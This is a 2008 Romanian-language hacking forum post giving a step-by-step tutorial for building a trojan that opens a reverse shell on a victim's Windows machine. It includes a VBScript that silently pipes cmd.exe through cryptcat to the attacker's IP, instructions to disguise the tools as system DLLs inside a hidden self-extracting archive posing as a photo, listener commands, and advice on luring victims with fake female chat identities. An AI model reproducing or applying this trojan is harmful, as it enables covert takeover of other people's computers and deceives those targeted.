patrundere in sisteme (obtinere remote shell)

 :: More
 :: HacKs

Vezi subiectul anterior Vezi subiectul urmator In jos

Frumos patrundere in sisteme (obtinere remote shell)

Mesaj Scris de D.S.S.H. la data de Sam Noi 22, 2008 9:22 pm

in tutorialul asta o sa explic cum sa troienizati , cu obiectivul final de a obtine un shell in sistemul victimei .

material necesar :
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- un joc flash , sau poze ... sau ce va vine in minte pt ca victima sa "pice"
5.- un mic script
link download cryptcat si nircmd : http://rapidshare.com/files/152664875/pt_sdh_by_d.s.s.h..rar.html
ceva info de cryptcat gasiti aici http://www.datastronghold.com/articles/3.html (sunt explicatii pt netcat , insa cryptcat e o versiune de netcat ... deci comenzile sunt valabile pt amandoua tooluri)
acum la treaba
!! in tutorial eu o sa folosesc o poza

in notepad puneti urmatorul script :

set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe ipulvostru 21 |cmd.exe| run32dll.exe ipulvostru 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide

asigurativa ca inlocuiti "ipulvostru" cu ipul real ... (in caz ca nu va stiti ipul - start-run-cmd -scrieti ipconfig dati enter si va da ipul ) , si salvati scriptul cu numele inetcpe.vbs

acum mutati cryptcat , nircmd , scriptul pe care l-am facut inainte si fotografia intr-un folder , si redenumitile astfel :

cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto=photo0078

acum aveti tot ce e necesar ... sa trecem la arhivare .
selectati toate 4 fisiere din folder , dati click dreapta si add to arhive ...
va apare fereastra cu optiunile de arhivare ... configurati astfel :
-archiving options : delete files after archiving si create sfx archive
-compression mode : best
din optiunile de sus ... dati click pe advanced si configurati apoi pe SFX options , si unde zice path to extract puneti c:\widows\system32 (asta e pt ca fisierele sa se extraga in system 32) , si unde pune Run after extraction puneti orice ... (ex : orice ) ; apoi mergeti la modes si bifati hide all si skip existing files .dati accept.mergeti la comment si modificati astfel :
Path=c\windows\system32
Setup=inetcpe.vbs
Setup=photo0078.jpg
Silent=1
Overwrite=2

dati accept ... si aveti creat troianul vostru cheers
schimbati numele arhivei in ceva care sa se potriveasca cu "capcana" ... in cazul asta am folosit o poza ... deci se poate numi poze arhiva ... daca folositi altceva ... schimbati numele , si schimbati tot ce e relationat cu poza in asa fel incat sa fie relationat cu ce ati pus voi in arhiva (un joc flash , un filmulet , un video , un yahoo password cracker etc)

acum gasiti o victima si datii arhiva ... (pt practica va puteti faceti un id de fata ... si sa luati idul unui fraier , sa faceti practica pe ei ... ca daca e vb de fete , unii obisnuiesc sa puna botul la orice)

acum deschideti cryptcat si scrieti -vvlp 21
deschideti inca o fereastra cu cryptcat si puneti -vvlp 25
si odata ce victima deschide arhiva ... obtinem shellul si avem sistemul victimei la picioarele noastre
cheers

odata ce ati obtinut shellul , comenzile se scriu in fereastra in care am pus -vvlp 21 si rezultatele apar in fereastra cu -vvlp 25 . (daca nu stiti comenzile ... cititi mini-tutorialul de cmd) ...

sper sa va fie de folos , si sa nu aveti probleme ... e tot destul de usor de facut ...
D.S.S.H.

salut
avatar
D.S.S.H.
Bishoujo
Bishoujo

Numarul mesajelor : 27
Varsta : 28
Data de inscriere : 22/11/2008

Vezi profilul utilizatorului http://sdh-downloads.forumz.ro

Sus In jos

Vezi subiectul anterior Vezi subiectul urmator Sus


 :: More
 :: HacKs

 
Permisiunile acestui forum:
Nu puteti raspunde la subiectele acestui forum